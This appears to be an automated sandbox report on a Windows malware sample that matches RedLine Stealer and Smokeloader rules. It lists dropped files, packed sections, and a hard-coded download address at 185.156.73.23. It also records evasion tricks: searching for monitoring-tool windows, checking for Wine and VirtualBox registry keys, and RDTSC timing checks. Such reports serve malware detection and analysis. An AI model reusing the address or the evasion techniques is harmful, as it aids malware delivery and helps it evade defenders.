Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00990F0E		0_2_00990F0E
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00983552		0_2_00983552
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00976F76		0_2_00976F76
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00A221A8		0_2_00A221A8
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04B4F587		0_2_04B4F587
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04B5A659		0_2_04B5A659
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04B4D644		0_2_04B4D644
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04B5A779		0_2_04B5A779
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04B53F4D		0_2_04B53F4D
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04B4D876		0_2_04B4D876
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04B4ABC7		0_2_04B4ABC7
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04B43B27		0_2_04B43B27

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: String function: 04B49E07 appears 35 times
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: String function: 04CE8FA0 appears 35 times
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: String function: 10003160 appears 34 times
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: String function: 00409BA0 appears 35 times

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 480

Source: dll[1].0.dr	Static PE information: No import functions for PE file found
Source: Bunifu_UI_v1.5.3.dll.0.dr	Static PE information: No import functions for PE file found
Source: soft[1].0.dr	Static PE information: No import functions for PE file found
Source: Y-Cleaner.exe.0.dr	Static PE information: No import functions for PE file found

Source: dll[1].0.dr	Static PE information: Data appended to the last section found
Source: Bunifu_UI_v1.5.3.dll.0.dr	Static PE information: Data appended to the last section found
Source: soft[1].0.dr	Static PE information: Data appended to the last section found
Source: Y-Cleaner.exe.0.dr	Static PE information: Data appended to the last section found

Source: WwVs3PavPg.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.3071582950.0000000000D39000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: WwVs3PavPg.exe

Static PE information: Section: bpztmzrt ZLIB complexity 0.990158833407145

Source: classification engine

Classification label: mal100.evad.winEXE@2/15@0/1

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

Code function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

Code function: 0_2_00D39F7E CreateToolhelp32Snapshot,Module32First,

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

Code function: 0_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\add[1].htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5740

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

File created: C:\Users\user\AppData\Local\Temp\KdYG3fvBdfevG5

Jump to behavior

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Command line argument: emp		0_2_00408020
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Command line argument: mixtwo		0_2_00408020

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: WwVs3PavPg.exe

ReversingLabs: Detection: 60%

Source: WwVs3PavPg.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: WwVs3PavPg.exe	String found in binary or memory: 185.156.73.23/add?substr=mixtwo&s=three&sub=emp

Source: unknown	Process created: C:\Users\user\Desktop\WwVs3PavPg.exe "C:\Users\user\Desktop\WwVs3PavPg.exe"
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 480

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: winmm.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: msimg32.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: msvcr100.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: linkinfo.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: ntshrui.dll			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Section loaded: cscapi.dll			Jump to behavior

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Cleaner.lnk.0.dr

LNK file: ..\AppData\Local\Temp\KdYG3fvBdfevG5\Y-Cleaner.exe

Source: WwVs3PavPg.exe

Static file information: File size 1928704 > 1048576

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: WwVs3PavPg.exe

Static PE information: Raw size of bpztmzrt is bigger than: 0x100000 < 0x1a7600

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

Unpacked PE file: 0.2.WwVs3PavPg.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bpztmzrt:EW;skyqimte:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Source: Y-Cleaner.exe.0.dr

Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: WwVs3PavPg.exe	Static PE information: real checksum: 0x1deaa7 should be: 0x1e1ef1
Source: dll[1].0.dr	Static PE information: real checksum: 0x0 should be: 0xe6d3
Source: Bunifu_UI_v1.5.3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0xe6d3
Source: soft[1].0.dr	Static PE information: real checksum: 0x0 should be: 0x1313c
Source: Y-Cleaner.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x1313c

Source: WwVs3PavPg.exe	Static PE information: section name:
Source: WwVs3PavPg.exe	Static PE information: section name: .idata
Source: WwVs3PavPg.exe	Static PE information: section name:
Source: WwVs3PavPg.exe	Static PE information: section name: bpztmzrt
Source: WwVs3PavPg.exe	Static PE information: section name: skyqimte
Source: WwVs3PavPg.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_3_04CFE2B5 push esi; ret		0_3_04CFE2BE
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_3_04D02B88 push ss; ret		0_3_04D02B89
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_0041FAB5 push esi; ret		0_2_0041FABE
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00424388 push ss; ret		0_2_00424389
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_1000E891 push ecx; ret		0_2_1000E8A4
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00AA14AF push ebp; ret		0_2_00AA14BE
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00A9F8A4 push ebp; ret		0_2_00A9F8B3
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00A9F4B9 push edx; ret		0_2_00A9F4C8
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00A9FCB8 push eax; ret		0_2_00A9FCC7
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00AA14BF push edx; ret		0_2_00AA14E2
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00AA288F push ebx; mov dword ptr [esp], edi		0_2_00AA28AC
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00AA288F push 4D7CD70Dh; mov dword ptr [esp], ecx		0_2_00AA2929
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00AA2C9B push 1E041733h; mov dword ptr [esp], esp		0_2_00AA2CD0
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00AA2C9B push eax; mov dword ptr [esp], edx		0_2_00AA2CF8
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00A9F8CB push esi; ret		0_2_00A9F8DA
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00A9F4DF push ecx; ret		0_2_00A9F4EE
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00A9F428 push ecx; ret		0_2_00A9F437
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00A9F800 push edx; ret		0_2_00A9F80F
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00A9F469 push edi; ret		0_2_00A9F478
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00AA145C push esi; ret		0_2_00AA146B
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00A9F99C push ebp; ret		0_2_00A9F9AB
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00AA1591 push eax; ret		0_2_00AA15A0
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00AA15C6 push eax; ret		0_2_00AA15D5
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00A9F9DC push ebp; ret		0_2_00A9F9EB
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00AA2D29 push 527CEC4Ch; mov dword ptr [esp], edi		0_2_00AA2D5C
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00AA2D29 push 1CFCC5AFh; mov dword ptr [esp], eax		0_2_00AA2D78
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00AA2D29 push ecx; mov dword ptr [esp], 6FDF8858h		0_2_00AA2DB6
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00AA313D push edx; mov dword ptr [esp], ebp		0_2_00AA3141
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00AA313D push ebx; mov dword ptr [esp], 399D47B4h		0_2_00AA323C
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00AA2D30 push 527CEC4Ch; mov dword ptr [esp], edi		0_2_00AA2D5C
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00AA2D30 push 1CFCC5AFh; mov dword ptr [esp], eax		0_2_00AA2D78

Source: WwVs3PavPg.exe

Static PE information: section name: bpztmzrt entropy: 7.949254049589531

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1]			Jump to dropped file
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\soft[1]			Jump to dropped file
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	File created: C:\Users\user\AppData\Local\Temp\KdYG3fvBdfevG5\Bunifu_UI_v1.5.3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	File created: C:\Users\user\AppData\Local\Temp\KdYG3fvBdfevG5\Y-Cleaner.exe			Jump to dropped file

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1]			Jump to dropped file
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\soft[1]			Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Window searched: window name: FilemonClass			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Window searched: window name: PROCMON_WINDOW_CLASS			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Window searched: window name: RegmonClass			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Window searched: window name: FilemonClass			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Window searched: window name: PROCMON_WINDOW_CLASS			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Window searched: window name: Regmonclass			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Window searched: window name: Filemonclass			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Window searched: window name: PROCMON_WINDOW_CLASS			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Window searched: window name: Regmonclass			Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9988BD second address: 9988C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 98677F second address: 986797 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F73F910AA62h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 986797 second address: 98679F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 98679F second address: 9867A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9867A3 second address: 9867A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9867A7 second address: 9867AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99790D second address: 997916 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 997916 second address: 997928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F73F910AA5Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 997A5A second address: 997A9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68F8h 0x00000007 js 00007F73F90B68E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnl 00007F73F90B68EAh 0x00000015 pop esi 0x00000016 pushad 0x00000017 push eax 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jno 00007F73F90B68E6h 0x00000023 jns 00007F73F90B68E6h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 997C0C second address: 997C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 997C11 second address: 997C2A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F73F90B68EBh 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F73F90B68E6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 997C2A second address: 997C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99AECD second address: 99AF15 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F73F90B68E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ecx, dword ptr [ebp+122D2B39h] 0x00000013 push 00000000h 0x00000015 or ecx, 3077F020h 0x0000001b call 00007F73F90B68E9h 0x00000020 jmp 00007F73F90B68F8h 0x00000025 push eax 0x00000026 push ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 jg 00007F73F90B68E6h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99AF15 second address: 99AF4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F73F910AA68h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push ecx 0x00000013 push ecx 0x00000014 jns 00007F73F910AA56h 0x0000001a pop ecx 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99AF4E second address: 99AF63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99AF63 second address: 99AF68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 99AF68 second address: 99AF6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
